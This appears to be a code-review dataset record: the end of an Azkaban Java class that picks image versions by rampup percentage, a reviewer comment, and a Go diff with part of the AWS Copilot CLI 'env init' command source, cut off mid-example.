updatedVersionInfoMap.putIfAbsent(map.getKey(), map.getValue())); } return updatedVersionInfoMap; } @Override public Map<String, VersionInfo> getVersionByImageTypes(final ExecutableFlow flow, final Set<String> imageTypes) throws ImageMgmtException { final Map<String, List<ImageRampup>> imageTypeRampups = this.imageRampupDao .getRampupByImageTypes(imageTypes); final Set<String> remainingImageTypes = new TreeSet<>(); final Map<String, ImageVersionMetadata> imageTypeVersionMap = this.processAndGetVersionForImageTypes(flow, imageTypes, imageTypeRampups, remainingImageTypes); // Throw exception if there are left over image types if (!remainingImageTypes.isEmpty()) { throw new ImageMgmtException("Could not fetch version for below image types. Reasons: " + " 1. There is no active rampup plan in the image_rampup_plan table. 2. There is no " + " active version in the image_versions table. Image Types: " + remainingImageTypes); } return this.createVersionInfoMap(imageTypeVersionMap); } @Override public VersionInfo getVersionInfo(final String imageType, final String imageVersion, final Set<State> stateFilter) throws ImageMgmtException { final Optional<ImageVersion> optionalImageVersion = this .fetchImageVersion(imageType, imageVersion); // If state filter is null or empty return the version info directly. // If state filter is present, apply the filter and return version info if (optionalImageVersion.isPresent() && ((stateFilter.isEmpty() || stateFilter == null) || stateFilter.contains(optionalImageVersion.get().getState()))) { return new VersionInfo(optionalImageVersion.get().getVersion(), optionalImageVersion.get().getPath(), optionalImageVersion.get().getState()); } else { throw new ImageMgmtException(String.format("Unable to get VersionInfo for image type: %s, " + "image version: %s with NEW or ACTIVE state.", imageType, imageVersion)); } } /** * This method processes image type rampup details for the image type and selects a version for * the image type. Here is the version selection process for an image type 1. Sort the ramp up * data in the ascending order of rampup percentage. 2. Generate a random number between 1 to 100 * both inclusive. Let us say the number the number generated is 60. 3. Let us say there are three * versions 1.1.1, 1.1.2 & and 1.1.3 with rampup percantages 10, 30 & 60 respectively. 4. The * above percentage fors three ranges [1 - 10], [11 - 40] & [41 - 100]. The random humber 60 * belongs to the last range i.e. [41 - 100] and hence version 1.1.3 will be selected. If random * number generated is 22 then version 1.1.2 will be selected and so on. 5. If there is no active * rampup plan for an image type or in the active plan if the version is marked unstable or * deprecated, and latest active version will be selected from the image_verions table. 6. If * there is no active version in the image_versions table, it will throw appropriate error message * mentioning could not select version for the image type and the whole process would fail. 7. * Follow the rampup procedure to elect a new version from the image_versions table for the ailed * image type. * * @param imageTypes - set of specified image types * @param imageTypeRampups - contains rampup list for an image type * @param remainingImageTypes - This set is used to keep track of the image types for which * version metadata is not available. * @return Map<String, VersionMetadata> */ private Map<String, ImageVersionMetadata> processAndGetVersionForImageTypes( final ExecutableFlow flow, final Set<String> imageTypes, final Map<String, List<ImageRampup>> imageTypeRampups, final Set<String> remainingImageTypes) { final Set<String> imageTypeSet = imageTypeRampups.keySet(); log.info("Found active rampup for the image types {} ", imageTypeSet); final Map<String, ImageVersionMetadata> imageTypeVersionMap = new TreeMap<>( String.CASE_INSENSITIVE_ORDER); final Map<String, ImageVersion> imageTypeRampupVersionMap = this.processAndGetRampupVersion(flow, imageTypeRampups); imageTypeRampupVersionMap .forEach((k, v) -> imageTypeVersionMap.put(k, new ImageVersionMetadata(v, imageTypeRampups.get(k), MSG_RANDOM_RAMPUP_VERSION_SELECTION))); log.info("After processing rampup records -> imageTypeVersionMap: {}", imageTypeVersionMap); /* * Fetching the latest active image version from image_versions table for the remaining image * types for which there is no active rampup plan or the versions are marked as * unstable/deprecated in the active plan. */ // Converts the input image types to lowercase for case insensitive comparison. final Set<String> imageTypesInLowerCase = imageTypes.stream().map(String::toLowerCase).collect(Collectors.toSet()); remainingImageTypes.addAll(imageTypesInLowerCase); remainingImageTypes .removeAll(imageTypeVersionMap.keySet().stream().map(String::toLowerCase).collect( Collectors.toSet())); log.info("After finding version through rampup image types remaining: {} ", remainingImageTypes); final Map<String, ImageVersion> imageTypeActiveVersionMap = this.processAndGetActiveImageVersion(remainingImageTypes); imageTypeActiveVersionMap .forEach((k, v) -> imageTypeVersionMap.put(k, new ImageVersionMetadata(v, MSG_ACTIVE_VERSION_SELECTION))); log.info("After fetching active image version -> imageTypeVersionMap {}", imageTypeVersionMap); // For the leftover image types throw exception with appropriate error message. remainingImageTypes .removeAll(imageTypeVersionMap.keySet().stream().map(String::toLowerCase).collect( Collectors.toSet())); log.info("After fetching version using ramp up and based on active image version the " + "image types remaining: {} ", remainingImageTypes); return imageTypeVersionMap; } /** * Method to process the rampup list and get the rampup version based on rampup logic for * the given image types in the rampup map. * * @param imageTypeRampups * @return Map<String, ImageVersion> */ private Map<String, ImageVersion> processAndGetRampupVersion( final ExecutableFlow flow, final Map<String, List<ImageRampup>> imageTypeRampups) { final Set<String> imageTypeSet = imageTypeRampups.keySet(); log.info("Found active rampup for the image types {} ", imageTypeSet); final Map<String, ImageVersion> imageTypeRampupVersionMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); if (imageTypeSet.isEmpty()) { log.warn("No active rampup found for the image types"); return imageTypeRampupVersionMap; } log.info("Found active rampup for the image types {} ", imageTypeSet); for (final String imageTypeName : imageTypeSet) { final List<ImageRampup> imageRampupList = imageTypeRampups.get(imageTypeName); if (imageRampupList.isEmpty()) { log.info("ImageRampupList was empty, so continue"); continue; } if (null == flow) { log.info("Flow object is null, so continue"); final ImageRampup firstImageRampup = imageRampupList.get(0); imageTypeRampupVersionMap.put(imageTypeName, this.fetchImageVersion(imageTypeName, firstImageRampup.getImageVersion()) .orElseThrow(() -> new ImageMgmtException( String.format("Unable to fetch version %s from image " + "versions table.", firstImageRampup.getImageVersion())))); continue; } int prevRampupPercentage = 0; final int flowNameHashValMapping = ContainerImplUtils.getFlowNameHashValMapping(flow); log.info("HashValMapping: " + flowNameHashValMapping); for (final ImageRampup imageRampup : imageRampupList) { final int rampupPercentage = imageRampup.getRampupPercentage(); if (flowNameHashValMapping >= prevRampupPercentage + 1 && flowNameHashValMapping <= prevRampupPercentage + rampupPercentage) { imageTypeRampupVersionMap.put(imageTypeName, this.fetchImageVersion(imageTypeName, imageRampup.getImageVersion()) .orElseThrow(() -> new ImageMgmtException( String.format("Unable to fetch version %s from image " + "versions table.", imageRampup.getImageVersion())))); log.debug("The image version {} is selected for image type {} with rampup percentage {}", imageRampup.getImageVersion(), imageTypeName, rampupPercentage); break; } log.info("ImageTypeRampupVersionMap: " + imageTypeRampupVersionMap); prevRampupPercentage += rampupPercentage; } } return imageTypeRampupVersionMap; } /** * Process and get latest active image version for the given image types. * * @param imageTypes * @return Map<String, ImageVersion> */ private Map<String, ImageVersion> processAndGetActiveImageVersion(final Set<String> imageTypes) { final Map<String, ImageVersion> imageTypeActiveVersionMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); if (!CollectionUtils.isEmpty(imageTypes)) { final List<ImageVersion> imageVersions = this.imageVersionDao.getActiveVersionByImageTypes(imageTypes); log.debug("Active image versions fetched: {} ", imageVersions); if (imageVersions != null && !imageVersions.isEmpty()) { for (final ImageVersion imageVersion : imageVersions) { imageTypeActiveVersionMap.put(imageVersion.getName(), imageVersion); } } } return imageTypeActiveVersionMap; } /** * Get latest non active image version for the given image types. * * @param imageTypes * @return Map<String, ImageVersion> */ private Map<String, ImageVersion> getLatestNonActiveImageVersion(final Set<String> imageTypes) { final Map<String, ImageVersion> imageTypeLatestNonActiveVersionMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); if (!CollectionUtils.isEmpty(imageTypes)) { final List<ImageVersion> imageVersions = this.imageVersionDao.getLatestNonActiveVersionByImageTypes(imageTypes); log.info("Non Active image versions fetched: {} ", imageVersions); if (imageVersions != null && !imageVersions.isEmpty()) { for (final ImageVersion imageVersion : imageVersions) { imageTypeLatestNonActiveVersionMap.put(imageVersion.getName(), imageVersion); } // Retain the the remaining/left over image types (i.e. image types without any version) imageTypes.removeAll(imageTypeLatestNonActiveVersionMap.keySet().stream() .map(String::toLowerCase) .collect(Collectors.toSet())); } } return imageTypeLatestNonActiveVersionMap; } /** * Method to fetch image version based on image type and image version. * * @param imageType * @param imageVersion * @return Optional<ImageVersion> */ private Optional<ImageVersion> fetchImageVersion(final String imageType, final String imageVersion) { final ImageMetadataRequest imageMetadataRequest = ImageMetadataRequest.newBuilder() .addParam(ImageMgmtConstants.IMAGE_TYPE, imageType) .addParam(ImageMgmtConstants.IMAGE_VERSION, imageVersion) .build(); final List<ImageVersion> imageVersions = this.imageVersionDao .findImageVersions(imageMetadataRequest); if (CollectionUtils.isEmpty(imageVersions)) { return Optional.empty(); } // Return only the imageVersion only when the image type/name matches for (final ImageVersion version : imageVersions) { if (version.getName().equalsIgnoreCase(imageType) && version.getVersion() .equalsIgnoreCase(imageVersion)) { return Optional.of(version); } } return Optional.empty(); } /** * Creates VersionInfo map from the ImageVersionMetadata map for the given image type keys. * * @param imageVersionMetadataMap * @return Map<String, VersionInfo> */ private Map<String, VersionInfo> createVersionInfoMap( final Map<String, ImageVersionMetadata> imageVersionMetadataMap) { final Map<String, VersionInfo> versionInfoMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER); imageVersionMetadataMap.forEach((k, v) -> versionInfoMap.put(k, new VersionInfo(v.getImageVersion().getVersion(), v.getImageVersion().getPath(), v.getImageVersion().getState()))); return versionInfoMap; } /** * Return rampup percentage comparator * * @return Comparator<ImageRampup> */ private Comparator<ImageRampup> getRampupPercentageComparator() { return Comparator.comparingInt(ImageRampup::getRampupPercentage); } }
1
22,332
I thought we decided on using the latest active version and not the one which is max ramped up.
azkaban-azkaban
java
@@ -461,10 +461,13 @@ https://aws.amazon.com/premiumsupport/knowledge-center/ecs-pull-container-api-er if err != nil { if err == selector.ErrSubnetsNotFound { log.Errorf(`No existing public subnets were found in VPC %s. You can either: -- Create new public subnets and then import them. -- Use the default Copilot environment configuration.`, o.importVPC.ID) +- %s to interrupt, create new public subnets, then rerun %s and import them. +- %s to interrupt, then rerun %s and use the default Copilot environment configuration. +- Proceed without public subnets, knowing that deploying a load-balanced web service in this environment will fail because Load Balancers require at least two public subnets in different Availability Zones. +`, o.importVPC.ID, color.HighlightUserInput("ctrl-c"), color.HighlightCode("copilot env init"), color.HighlightUserInput("ctrl-c"), color.HighlightCode("copilot env init")) + } else { + return fmt.Errorf("select public subnets: %w", err) } - return fmt.Errorf("select public subnets: %w", err) } o.importVPC.PublicSubnetIDs = publicSubnets }
1
// Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. // SPDX-License-Identifier: Apache-2.0 package cli import ( "errors" "fmt" "net" "os" "strings" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/session" "github.com/aws/copilot-cli/internal/pkg/aws/cloudformation" "github.com/aws/copilot-cli/internal/pkg/aws/ec2" "github.com/aws/copilot-cli/internal/pkg/aws/iam" "github.com/aws/copilot-cli/internal/pkg/aws/identity" "github.com/aws/copilot-cli/internal/pkg/aws/profile" "github.com/aws/copilot-cli/internal/pkg/aws/s3" "github.com/aws/copilot-cli/internal/pkg/aws/sessions" "github.com/aws/copilot-cli/internal/pkg/config" "github.com/aws/copilot-cli/internal/pkg/deploy" deploycfn "github.com/aws/copilot-cli/internal/pkg/deploy/cloudformation" "github.com/aws/copilot-cli/internal/pkg/deploy/cloudformation/stack" "github.com/aws/copilot-cli/internal/pkg/template" "github.com/aws/copilot-cli/internal/pkg/term/color" "github.com/aws/copilot-cli/internal/pkg/term/log" termprogress "github.com/aws/copilot-cli/internal/pkg/term/progress" "github.com/aws/copilot-cli/internal/pkg/term/prompt" "github.com/aws/copilot-cli/internal/pkg/term/selector" "github.com/spf13/cobra" "github.com/spf13/pflag" ) const ( envInitAppNameHelpPrompt = "An environment will be created in the selected application." envInitNamePrompt = "What is your environment's name?" envInitNameHelpPrompt = "A unique identifier for an environment (e.g. dev, test, prod)." envInitDefaultEnvConfirmPrompt = `Would you like to use the default configuration for a new environment? - A new VPC with 2 AZs, 2 public subnets and 2 private subnets - A new ECS Cluster - New IAM Roles to manage services and jobs in your environment ` envInitVPCSelectPrompt = "Which VPC would you like to use?" envInitPublicSubnetsSelectPrompt = "Which public subnets would you like to use?" envInitPrivateSubnetsSelectPrompt = "Which private subnets would you like to use?" envInitVPCCIDRPrompt = "What VPC CIDR would you like to use?" envInitVPCCIDRPromptHelp = "CIDR used for your VPC. For example: 10.1.0.0/16" envInitPublicCIDRPrompt = "What CIDR would you like to use for your public subnets?" envInitPublicCIDRPromptHelp = "CIDRs used for your public subnets. For example: 10.1.0.0/24,10.1.1.0/24" envInitPrivateCIDRPrompt = "What CIDR would you like to use for your private subnets?" envInitPrivateCIDRPromptHelp = "CIDRs used for your private subnets. For example: 10.1.2.0/24,10.1.3.0/24" fmtEnvInitCredsPrompt = "Which credentials would you like to use to create %s?" envInitCredsHelpPrompt = `The credentials are used to create your environment in an AWS account and region. To learn more: https://aws.github.io/copilot-cli/docs/credentials/#environment-credentials` envInitRegionPrompt = "Which region?" envInitDefaultRegionOption = "us-west-2" fmtDNSDelegationStart = "Sharing DNS permissions for this application to account %s." fmtDNSDelegationFailed = "Failed to grant DNS permissions to account %s.\n\n" fmtDNSDelegationComplete = "Shared DNS permissions for this application to account %s.\n\n" fmtAddEnvToAppStart = "Linking account %s and region %s to application %s." fmtAddEnvToAppFailed = "Failed to link account %s and region %s to application %s.\n\n" fmtAddEnvToAppComplete = "Linked account %s and region %s to application %s.\n\n" ) var ( envInitAppNamePrompt = fmt.Sprintf("In which %s would you like to create the environment?", color.Emphasize("application")) envInitDefaultConfigSelectOption = "Yes, use default." envInitAdjustEnvResourcesSelectOption = "Yes, but I'd like configure the default resources (CIDR ranges)." envInitImportEnvResourcesSelectOption = "No, I'd like to import existing resources (VPC, subnets)." envInitCustomizedEnvTypes = []string{envInitDefaultConfigSelectOption, envInitAdjustEnvResourcesSelectOption, envInitImportEnvResourcesSelectOption} ) type importVPCVars struct { ID string PublicSubnetIDs []string PrivateSubnetIDs []string } func (v importVPCVars) isSet() bool { if v.ID != "" { return true } return len(v.PublicSubnetIDs) > 0 || len(v.PrivateSubnetIDs) > 0 } type adjustVPCVars struct { CIDR net.IPNet PublicSubnetCIDRs []string PrivateSubnetCIDRs []string } func (v adjustVPCVars) isSet() bool { if v.CIDR.String() != emptyIPNet.String() { return true } return len(v.PublicSubnetCIDRs) != 0 || len(v.PrivateSubnetCIDRs) != 0 } type tempCredsVars struct { AccessKeyID string SecretAccessKey string SessionToken string } func (v tempCredsVars) isSet() bool { return v.AccessKeyID != "" && v.SecretAccessKey != "" } type initEnvVars struct { appName string name string // Name for the environment. profile string // The named profile to use for credential retrieval. Mutually exclusive with tempCreds. isProduction bool // True means retain resources even after deletion. defaultConfig bool // True means using default environment configuration. importVPC importVPCVars // Existing VPC resources to use instead of creating new ones. adjustVPC adjustVPCVars // Configure parameters for VPC resources generated while initializing an environment. tempCreds tempCredsVars // Temporary credentials to initialize the environment. Mutually exclusive with the profile. region string // The region to create the environment in. } type initEnvOpts struct { initEnvVars // Interfaces to interact with dependencies. sessProvider sessionProvider store store envDeployer deployer appDeployer deployer identity identityService envIdentity identityService ec2Client ec2Client iam roleManager cfn stackExistChecker prog progress prompt prompter selVPC ec2Selector selCreds credsSelector selApp appSelector appCFN appResourcesGetter newS3 func(string) (zipAndUploader, error) uploader customResourcesUploader sess *session.Session // Session pointing to environment's AWS account and region. } func newInitEnvOpts(vars initEnvVars) (*initEnvOpts, error) { store, err := config.NewStore() if err != nil { return nil, err } sessProvider := sessions.NewProvider() defaultSession, err := sessProvider.Default() if err != nil { return nil, err } cfg, err := profile.NewConfig() if err != nil { return nil, fmt.Errorf("read named profiles: %w", err) } prompter := prompt.New() return &initEnvOpts{ initEnvVars: vars, sessProvider: sessProvider, store: store, appDeployer: deploycfn.New(defaultSession), identity: identity.New(defaultSession), prog: termprogress.NewSpinner(log.DiagnosticWriter), prompt: prompter, selCreds: &selector.CredsSelect{ Session: sessProvider, Profile: cfg, Prompt: prompter, }, selApp: selector.NewSelect(prompt.New(), store), uploader: template.New(), appCFN: deploycfn.New(defaultSession), newS3: func(region string) (zipAndUploader, error) { sess, err := sessProvider.DefaultWithRegion(region) if err != nil { return nil, err } return s3.New(sess), nil }, }, nil } // Validate returns an error if the values passed by flags are invalid. func (o *initEnvOpts) Validate() error { if o.name != "" { if err := validateEnvironmentName(o.name); err != nil { return err } } if err := o.validateCustomizedResources(); err != nil { return err } return o.validateCredentials() } // Ask asks for fields that are required but not passed in. func (o *initEnvOpts) Ask() error { if err := o.askAppName(); err != nil { return err } if err := o.askEnvName(); err != nil { return err } if err := o.askEnvSession(); err != nil { return err } if err := o.askEnvRegion(); err != nil { return err } return o.askCustomizedResources() } // Execute deploys a new environment with CloudFormation and adds it to SSM. func (o *initEnvOpts) Execute() error { o.initRuntimeClients() app, err := o.store.GetApplication(o.appName) if err != nil { // Ensure the app actually exists before we do a deployment. return err } envCaller, err := o.envIdentity.Get() if err != nil { return fmt.Errorf("get identity: %w", err) } if app.RequiresDNSDelegation() { if err := o.delegateDNSFromApp(app, envCaller.Account); err != nil { return fmt.Errorf("granting DNS permissions: %w", err) } } // 1. Attempt to create the service linked role if it doesn't exist. // If the call fails because the role already exists, nothing to do. // If the call fails because the user doesn't have permissions, then the role must be created outside of Copilot. _ = o.iam.CreateECSServiceLinkedRole() // 2. Add the stack set instance to the app stackset. if err := o.addToStackset(&deploycfn.AddEnvToAppOpts{ App: app, EnvName: o.name, EnvRegion: aws.StringValue(o.sess.Config.Region), EnvAccountID: envCaller.Account, }); err != nil { return err } // 3. Upload environment custom resource scripts to the S3 bucket, because of the 4096 characters limit (see // https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-lambda-function-code.html#cfn-lambda-function-code-zipfile) envRegion := aws.StringValue(o.sess.Config.Region) resources, err := o.appCFN.GetAppResourcesByRegion(app, envRegion) if err != nil { return fmt.Errorf("get app resources: %w", err) } s3Client, err := o.newS3(envRegion) if err != nil { return err } urls, err := o.uploader.UploadEnvironmentCustomResources(s3.CompressAndUploadFunc(func(key string, objects ...s3.NamedBinary) (string, error) { return s3Client.ZipAndUpload(resources.S3Bucket, key, objects...) })) if err != nil { return fmt.Errorf("upload custom resources to bucket %s: %w", resources.S3Bucket, err) } // 4. Start creating the CloudFormation stack for the environment. if err := o.deployEnv(app, urls); err != nil { return err } // 5. Get the environment env, err := o.envDeployer.GetEnvironment(o.appName, o.name) if err != nil { return fmt.Errorf("get environment struct for %s: %w", o.name, err) } env.Prod = o.isProduction env.CustomConfig = config.NewCustomizeEnv(o.importVPCConfig(), o.adjustVPCConfig()) // 6. Store the environment in SSM. if err := o.store.CreateEnvironment(env); err != nil { return fmt.Errorf("store environment: %w", err) } log.Successf("Created environment %s in region %s under application %s.\n", color.HighlightUserInput(env.Name), color.Emphasize(env.Region), color.HighlightUserInput(env.App)) return nil } // RecommendedActions returns follow-up actions the user can take after successfully executing the command. func (o *initEnvOpts) RecommendedActions() []string { return nil } func (o *initEnvOpts) initRuntimeClients() { // Initialize environment clients if not set. if o.envIdentity == nil { o.envIdentity = identity.New(o.sess) } if o.envDeployer == nil { o.envDeployer = deploycfn.New(o.sess) } if o.cfn == nil { o.cfn = cloudformation.New(o.sess) } if o.iam == nil { o.iam = iam.New(o.sess) } } func (o *initEnvOpts) validateCustomizedResources() error { if o.importVPC.isSet() && o.adjustVPC.isSet() { return errors.New("cannot specify both import vpc flags and configure vpc flags") } if (o.importVPC.isSet() || o.adjustVPC.isSet()) && o.defaultConfig { return fmt.Errorf("cannot import or configure vpc if --%s is set", defaultConfigFlag) } return nil } func (o *initEnvOpts) askAppName() error { if o.appName != "" { return nil } app, err := o.selApp.Application(envInitAppNamePrompt, envInitAppNameHelpPrompt) if err != nil { return fmt.Errorf("ask for application: %w", err) } o.appName = app return nil } func (o *initEnvOpts) askEnvName() error { if o.name != "" { return nil } envName, err := o.prompt.Get(envInitNamePrompt, envInitNameHelpPrompt, validateEnvironmentName) if err != nil { return fmt.Errorf("get environment name: %w", err) } o.name = envName return nil } func (o *initEnvOpts) askEnvSession() error { if o.profile != "" { sess, err := o.sessProvider.FromProfile(o.profile) if err != nil { return fmt.Errorf("create session from profile %s: %w", o.profile, err) } o.sess = sess return nil } if o.tempCreds.isSet() { sess, err := o.sessProvider.FromStaticCreds(o.tempCreds.AccessKeyID, o.tempCreds.SecretAccessKey, o.tempCreds.SessionToken) if err != nil { return err } o.sess = sess return nil } sess, err := o.selCreds.Creds(fmt.Sprintf(fmtEnvInitCredsPrompt, color.HighlightUserInput(o.name)), envInitCredsHelpPrompt) if err != nil { return fmt.Errorf("select creds: %w", err) } o.sess = sess return nil } func (o *initEnvOpts) askEnvRegion() error { region := aws.StringValue(o.sess.Config.Region) if o.region != "" { region = o.region } if region == "" { v, err := o.prompt.Get(envInitRegionPrompt, "", nil, prompt.WithDefaultInput(envInitDefaultRegionOption)) if err != nil { return fmt.Errorf("get environment region: %w", err) } region = v } o.sess.Config.Region = aws.String(region) return nil } func (o *initEnvOpts) askCustomizedResources() error { if o.defaultConfig { return nil } if o.importVPC.isSet() { return o.askImportResources() } if o.adjustVPC.isSet() { return o.askAdjustResources() } adjustOrImport, err := o.prompt.SelectOne( envInitDefaultEnvConfirmPrompt, "", envInitCustomizedEnvTypes) if err != nil { return fmt.Errorf("select adjusting or importing resources: %w", err) } switch adjustOrImport { case envInitImportEnvResourcesSelectOption: return o.askImportResources() case envInitAdjustEnvResourcesSelectOption: return o.askAdjustResources() case envInitDefaultConfigSelectOption: return nil } return nil } func (o *initEnvOpts) askImportResources() error { if o.selVPC == nil { o.selVPC = selector.NewEC2Select(o.prompt, ec2.New(o.sess)) } if o.importVPC.ID == "" { vpcID, err := o.selVPC.VPC(envInitVPCSelectPrompt, "") if err != nil { if err == selector.ErrVPCNotFound { log.Errorf(`No existing VPCs were found. You can either: - Create a new VPC first and then import it. - Use the default Copilot environment configuration. `) } return fmt.Errorf("select VPC: %w", err) } o.importVPC.ID = vpcID } if o.ec2Client == nil { o.ec2Client = ec2.New(o.sess) } dnsSupport, err := o.ec2Client.HasDNSSupport(o.importVPC.ID) if err != nil { return fmt.Errorf("check if VPC %s has DNS support enabled: %w", o.importVPC.ID, err) } if !dnsSupport { log.Errorln(`Looks like you're creating an environment using a VPC with DNS support *disabled*. Copilot cannot create services or jobs in VPCs without DNS support. We recommend enabling this property. To learn more about the issue: https://aws.amazon.com/premiumsupport/knowledge-center/ecs-pull-container-api-error-ecr/`) return fmt.Errorf("VPC %s has no DNS support enabled", o.importVPC.ID) } if o.importVPC.PublicSubnetIDs == nil { publicSubnets, err := o.selVPC.PublicSubnets(envInitPublicSubnetsSelectPrompt, "", o.importVPC.ID) if err != nil { if err == selector.ErrSubnetsNotFound { log.Errorf(`No existing public subnets were found in VPC %s. You can either: - Create new public subnets and then import them. - Use the default Copilot environment configuration.`, o.importVPC.ID) } return fmt.Errorf("select public subnets: %w", err) } o.importVPC.PublicSubnetIDs = publicSubnets } if o.importVPC.PrivateSubnetIDs == nil { privateSubnets, err := o.selVPC.PrivateSubnets(envInitPrivateSubnetsSelectPrompt, "", o.importVPC.ID) if err != nil { if err == selector.ErrSubnetsNotFound { log.Errorf(`No existing private subnets were found in VPC %s. You can either: - Create new private subnets and then import them. - Use the default Copilot environment configuration.`, o.importVPC.ID) } return fmt.Errorf("select private subnets: %w", err) } o.importVPC.PrivateSubnetIDs = privateSubnets } return nil } func (o *initEnvOpts) askAdjustResources() error { if o.adjustVPC.CIDR.String() == emptyIPNet.String() { vpcCIDRString, err := o.prompt.Get(envInitVPCCIDRPrompt, envInitVPCCIDRPromptHelp, validateCIDR, prompt.WithDefaultInput(stack.DefaultVPCCIDR)) if err != nil { return fmt.Errorf("get VPC CIDR: %w", err) } _, vpcCIDR, err := net.ParseCIDR(vpcCIDRString) if err != nil { return fmt.Errorf("parse VPC CIDR: %w", err) } o.adjustVPC.CIDR = *vpcCIDR } if o.adjustVPC.PublicSubnetCIDRs == nil { publicCIDR, err := o.prompt.Get(envInitPublicCIDRPrompt, envInitPublicCIDRPromptHelp, validateCIDRSlice, prompt.WithDefaultInput(stack.DefaultPublicSubnetCIDRs)) if err != nil { return fmt.Errorf("get public subnet CIDRs: %w", err) } o.adjustVPC.PublicSubnetCIDRs = strings.Split(publicCIDR, ",") } if o.adjustVPC.PrivateSubnetCIDRs == nil { privateCIDR, err := o.prompt.Get(envInitPrivateCIDRPrompt, envInitPrivateCIDRPromptHelp, validateCIDRSlice, prompt.WithDefaultInput(stack.DefaultPrivateSubnetCIDRs)) if err != nil { return fmt.Errorf("get private subnet CIDRs: %w", err) } o.adjustVPC.PrivateSubnetCIDRs = strings.Split(privateCIDR, ",") } return nil } func (o *initEnvOpts) importVPCConfig() *config.ImportVPC { if o.defaultConfig || !o.importVPC.isSet() { return nil } return &config.ImportVPC{ ID: o.importVPC.ID, PrivateSubnetIDs: o.importVPC.PrivateSubnetIDs, PublicSubnetIDs: o.importVPC.PublicSubnetIDs, } } func (o *initEnvOpts) adjustVPCConfig() *config.AdjustVPC { if o.defaultConfig || !o.adjustVPC.isSet() { return nil } return &config.AdjustVPC{ CIDR: o.adjustVPC.CIDR.String(), PrivateSubnetCIDRs: o.adjustVPC.PrivateSubnetCIDRs, PublicSubnetCIDRs: o.adjustVPC.PublicSubnetCIDRs, } } func (o *initEnvOpts) deployEnv(app *config.Application, customResourcesURLs map[string]string) error { caller, err := o.identity.Get() if err != nil { return fmt.Errorf("get identity: %w", err) } deployEnvInput := &deploy.CreateEnvironmentInput{ Name: o.name, AppName: o.appName, Prod: o.isProduction, ToolsAccountPrincipalARN: caller.RootUserARN, AppDNSName: app.Domain, AdditionalTags: app.Tags, CustomResourcesURLs: customResourcesURLs, AdjustVPCConfig: o.adjustVPCConfig(), ImportVPCConfig: o.importVPCConfig(), Version: deploy.LatestEnvTemplateVersion, } if err := o.cleanUpDanglingRoles(o.appName, o.name); err != nil { return err } if err := o.envDeployer.DeployAndRenderEnvironment(os.Stderr, deployEnvInput); err != nil { var existsErr *cloudformation.ErrStackAlreadyExists if errors.As(err, &existsErr) { // Do nothing if the stack already exists. return nil } // The stack failed to create due to an unexpect reason. // Delete the retained roles created part of the stack. o.tryDeletingEnvRoles(o.appName, o.name) return err } return nil } func (o *initEnvOpts) addToStackset(opts *deploycfn.AddEnvToAppOpts) error { o.prog.Start(fmt.Sprintf(fmtAddEnvToAppStart, color.Emphasize(opts.EnvAccountID), color.Emphasize(opts.EnvRegion), color.HighlightUserInput(o.appName))) if err := o.appDeployer.AddEnvToApp(opts); err != nil { o.prog.Stop(log.Serrorf(fmtAddEnvToAppFailed, color.Emphasize(opts.EnvAccountID), color.Emphasize(opts.EnvRegion), color.HighlightUserInput(o.appName))) return fmt.Errorf("deploy env %s to application %s: %w", opts.EnvName, opts.App.Name, err) } o.prog.Stop(log.Ssuccessf(fmtAddEnvToAppComplete, color.Emphasize(opts.EnvAccountID), color.Emphasize(opts.EnvRegion), color.HighlightUserInput(o.appName))) return nil } func (o *initEnvOpts) delegateDNSFromApp(app *config.Application, accountID string) error { // By default, our DNS Delegation permits same account delegation. if accountID == app.AccountID { return nil } o.prog.Start(fmt.Sprintf(fmtDNSDelegationStart, color.HighlightUserInput(accountID))) if err := o.appDeployer.DelegateDNSPermissions(app, accountID); err != nil { o.prog.Stop(log.Serrorf(fmtDNSDelegationFailed, color.HighlightUserInput(accountID))) return err } o.prog.Stop(log.Ssuccessf(fmtDNSDelegationComplete, color.HighlightUserInput(accountID))) return nil } func (o *initEnvOpts) validateCredentials() error { if o.profile != "" && o.tempCreds.AccessKeyID != "" { return fmt.Errorf("cannot specify both --%s and --%s", profileFlag, accessKeyIDFlag) } if o.profile != "" && o.tempCreds.SecretAccessKey != "" { return fmt.Errorf("cannot specify both --%s and --%s", profileFlag, secretAccessKeyFlag) } if o.profile != "" && o.tempCreds.SessionToken != "" { return fmt.Errorf("cannot specify both --%s and --%s", profileFlag, sessionTokenFlag) } return nil } // cleanUpDanglingRoles deletes any IAM roles created for the same app and env that were left over from a previous // environment creation. func (o *initEnvOpts) cleanUpDanglingRoles(app, env string) error { exists, err := o.cfn.Exists(stack.NameForEnv(app, env)) if err != nil { return fmt.Errorf("check if stack %s exists: %w", stack.NameForEnv(app, env), err) } if exists { return nil } // There is no environment stack. Either the customer ran "env delete" before, or it's their // first time running this command. // We should clean up any IAM roles that were *not* deleted during "env delete" // before re-creating the stack otherwise the deployment will fail. o.tryDeletingEnvRoles(app, env) return nil } // tryDeletingEnvRoles attempts a best effort deletion of IAM roles created from an environment. // To ensure that the roles being deleted were created by Copilot, we check if the copilot-environment tag // is applied to the role. func (o *initEnvOpts) tryDeletingEnvRoles(app, env string) { roleNames := []string{ fmt.Sprintf("%s-CFNExecutionRole", stack.NameForEnv(app, env)), fmt.Sprintf("%s-EnvManagerRole", stack.NameForEnv(app, env)), } for _, roleName := range roleNames { tags, err := o.iam.ListRoleTags(roleName) if err != nil { continue } if _, hasTag := tags[deploy.EnvTagKey]; !hasTag { continue } _ = o.iam.DeleteRole(roleName) } } // buildEnvInitCmd builds the command for adding an environment. func buildEnvInitCmd() *cobra.Command { vars := initEnvVars{} cmd := &cobra.Command{ Use: "init", Short: "Creates a new environment in your application.", Example: ` Creates a test environment in your "default" AWS profile using default configuration. /code $ copilot env init --name test --profile default --default-config Creates a prod-iad environment using your "prod-admin" AWS profile. /code $ copilot env init --name prod-iad --profile prod-admin --prod Creates an environment with imported VPC resources. /code $ copilot env init --import-vpc-id vpc-099c32d2b98cdcf47 \ /code --import-public-subnets subnet-013e8b691862966cf,subnet -014661ebb7ab8681a \ /code --import-private-subnets subnet-055fafef48fb3c547,subnet-00c9e76f288363e7f Creates an environment with overrided CIDRs. /code $ copilot env init --override-vpc-cidr 10.1.0.0/16 \ /code --override-public-cidrs 